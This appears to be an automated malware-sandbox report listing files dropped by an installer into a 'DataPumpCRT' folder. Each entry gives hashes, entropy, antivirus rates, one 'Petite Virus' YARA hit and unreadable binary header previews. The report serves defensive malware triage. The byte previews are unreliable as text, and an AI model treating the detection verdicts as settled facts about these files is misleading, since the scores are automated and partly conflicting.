Preview:	MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-S6TO1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11532
Entropy (8bit):	7.219753259626605
Encrypted:	false
SSDEEP:	192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
MD5:	073F34B193F0831B3DD86313D74F1D2A
SHA1:	3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
SHA-256:	C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
SHA-512:	EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
Malicious:	false
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-S6TO1.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite.............................`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\...S...s..$..........o..y..........,.........-..X.....v.M1..'...5R.4..8k!..q.=BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z..).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-SA8KK.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	512014
Entropy (8bit):	6.566561154468342
Encrypted:	false
SSDEEP:	12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
MD5:	C4A2068C59597175CD1A29F3E7F31BC1
SHA1:	89DE0169028E2BDD5F87A51E2251F7364981044D
SHA-256:	7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
SHA-512:	0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-T2EVG.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	214016
Entropy (8bit):	6.676457645865373
Encrypted:	false
SSDEEP:	3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
MD5:	2C747F19BF1295EBBDAB9FB14BB19EE2
SHA1:	6F3B71826C51C739D6BB75085E634B2B2EF538BC
SHA-256:	D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
SHA-512:	C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-T6JUK.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	39304
Entropy (8bit):	7.819409739152795
Encrypted:	false
SSDEEP:	768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
MD5:	C7A50ACE28DDE05B897E000FA398BBCE
SHA1:	33DA507B06614F890D8C8239E71D3D1372E61DAA
SHA-256:	F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
SHA-512:	4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.\|w.t...\..dkB%..i.cX...`B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....\|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TLO0A.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	562190
Entropy (8bit):	6.388293171196564
Encrypted:	false
SSDEEP:	12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
MD5:	713D04E7396D3A4EFF6BF8BA8B9CB2CD
SHA1:	D824F373C219B33988CFA3D4A53E7C2BFA096870
SHA-256:	00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
SHA-512:	30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rd...............(..........................@.......................................@... .................................H...........................................................D...........................l............................text...T...........................`..`.data...X...........................@....rdata..H...........................@..@/4......P...........................@..@.bss....t................................idata..H............d..............@....CRT....0............n..............@....tls.................p..............@....rsrc................r..............@....reloc...............x..............@..B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TU4E5.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	772608
Entropy (8bit):	6.546391052615969
Encrypted:	false
SSDEEP:	6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
MD5:	B3B487FC3832B607A853211E8AC42CAD
SHA1:	06E32C28103D33DAD53BE06C894203F8808D38C1
SHA-256:	30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
SHA-512:	FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-UJ6TD.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	648384
Entropy (8bit):	6.666474522542094
Encrypted:	false
SSDEEP:	12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
MD5:	CE7DE939D74321A7D0E9BDF534B89AB9
SHA1:	56082B4E09A543562297E098A36AADC3338DEEC5
SHA-256:	A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
SHA-512:	03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-UMGQV.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	15374
Entropy (8bit):	5.192037544202194
Encrypted:	false
SSDEEP:	384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
MD5:	BEFD36FE8383549246E1FD49DB270C07
SHA1:	1EF12B568599F31292879A8581F6CD0279F3E92A
SHA-256:	B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
SHA-512:	FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\lame_enc.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	967168
Entropy (8bit):	6.500850562754145
Encrypted:	false
SSDEEP:	12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
MD5:	C06D6F4DABD9E8BBDECFC5D61B43A8A9
SHA1:	16D9F4F035835AFE8F694AE5529F95E4C3C78526
SHA-256:	665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
SHA-512:	B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\lessmsi\is-RTDJ5.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	506871
Entropy (8bit):	7.998074018431883
Encrypted:	true
SSDEEP:	12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
MD5:	D52F8AE89AC65F755C28A95C274C1FFE
SHA1:	50D581469FF0648EE628A027396F39598995D8B0
SHA-256:	2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
SHA-512:	B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
Malicious:	false
Preview:	PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...."......US.R.SB....i.....T.R.......3./;/..Q.].{....:s=t.c....\|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx\|...}MA.n.].q:!]iB`....\|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O....P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........

C:\Program Files (x86)\DataPumpCRT\bin\x86\lessmsi\lessmsi-v1.6.91.zip (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	506871
Entropy (8bit):	7.998074018431883
Encrypted:	true
SSDEEP:	12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
MD5:	D52F8AE89AC65F755C28A95C274C1FFE
SHA1:	50D581469FF0648EE628A027396F39598995D8B0
SHA-256:	2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
SHA-512:	B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
Malicious:	false
Preview:	PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...."......US.R.SB....i.....T.R.......3./;/..Q.].{....:s=t.c....\|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx\|...}MA.n.].q:!]iB`....\|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O....P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........

C:\Program Files (x86)\DataPumpCRT\bin\x86\libFLAC_dynamic.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	512014
Entropy (8bit):	6.566561154468342
Encrypted:	false
SSDEEP:	12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
MD5:	C4A2068C59597175CD1A29F3E7F31BC1
SHA1:	89DE0169028E2BDD5F87A51E2251F7364981044D
SHA-256:	7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
SHA-512:	0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\libdtsdec.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	126478
Entropy (8bit):	6.268811819718352
Encrypted:	false
SSDEEP:	3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
MD5:	6E93C9C8AADA15890073E74ED8D400C9
SHA1:	94757DBD181346C7933694EA7D217B2B7977CC5F
SHA-256:	B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
SHA-512:	A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\libmp4v2.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	845312
Entropy (8bit):	6.581151900686739
Encrypted:	false
SSDEEP:	24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
MD5:	00C672988C2B0A2CB818F4D382C1BE5D
SHA1:	57121C4852B36746146B10B5B97B5A76628F385F
SHA-256:	4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
SHA-512:	C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...va.va.va.b..fa.b...a.b..`a.$..ya.$..`a.$..1a.b..ua.va.*a. ...a. ..wa. ...wa.vat.wa. ..wa.Richva.................PE..L......c...........!.................F.......0............................... ......u.....@.......................... ...q..t...(....P.......................`..p.......T...........................8...@............0..D............................text............................... ..`.rdata...i...0...j..................@..@.data...............................@....rsrc........P.......(..............@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\libsox-3.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	648384
Entropy (8bit):	6.666474522542094
Encrypted:	false
SSDEEP:	12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
MD5:	CE7DE939D74321A7D0E9BDF534B89AB9
SHA1:	56082B4E09A543562297E098A36AADC3338DEEC5
SHA-256:	A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
SHA-512:	03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\libsoxr.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	227328
Entropy (8bit):	6.641153481093122
Encrypted:	false
SSDEEP:	6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
MD5:	BC824DC1D1417DE0A0E47A30A51428FD
SHA1:	C909C48C625488508026C57D1ED75A4AE6A7F9DB
SHA-256:	A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
SHA-512:	566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\libvorbis.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	867854
Entropy (8bit):	4.9264497464202694
Encrypted:	false
SSDEEP:	12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
MD5:	B476CA59D61F11B7C0707A5CF3FE6E89
SHA1:	1A1E7C291F963C12C9B46E8ED692104C51389E69
SHA-256:	AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
SHA-512:	D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>.........#.........:....................Xd................................l6........ ......................@..b....P..p..........................................................L.......................0Q...............................text...D...........................`.P`.data...x...........................@.P..rdata...%.......&..................@.`@/4.......K.......L..................@.0@.bss.........0........................`..edata..b....@......................@.0@.idata..p....P......................@.0..CRT....,....`......................@.0..tls.........p......................@.0..reloc..........,..................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\libwebp.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	394752
Entropy (8bit):	6.662070316214798
Encrypted:	false
SSDEEP:	6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
MD5:	A4123DE65270C91849FFEB8515A864C4
SHA1:	93971C6BB25F3F4D54D4DF6C0C002199A2F84525
SHA-256:	43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
SHA-512:	D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\libwinpthread-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	68042
Entropy (8bit):	6.090396152400884
Encrypted:	false
SSDEEP:	768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
